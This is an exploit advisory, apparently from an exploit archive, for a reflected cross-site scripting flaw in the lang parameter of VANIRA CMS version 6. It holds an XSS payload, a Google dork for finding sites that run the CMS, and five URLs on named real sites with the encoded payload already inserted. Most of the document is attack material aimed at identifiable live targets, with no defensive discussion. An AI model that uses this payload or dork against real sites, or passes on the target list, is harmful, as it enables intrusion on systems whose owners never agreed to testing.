######################
# Exploit Title : VANIRA CMS Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://tursweb.com/
# Google Dork : "Web Design > Tursweb.com " lang=
# Date: 2016/02/23
# Version : 6
######################
# PoC:
# lang=[XSS]
# Payload = '><img onerror=alert(1) src="asd">
#
# http://hncmed.ir/home.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://gceramas.ir/pdview.php?&lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://isatismodava.com/home.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://spadk9.com/shopcat.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://iransommer.com/productcat.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################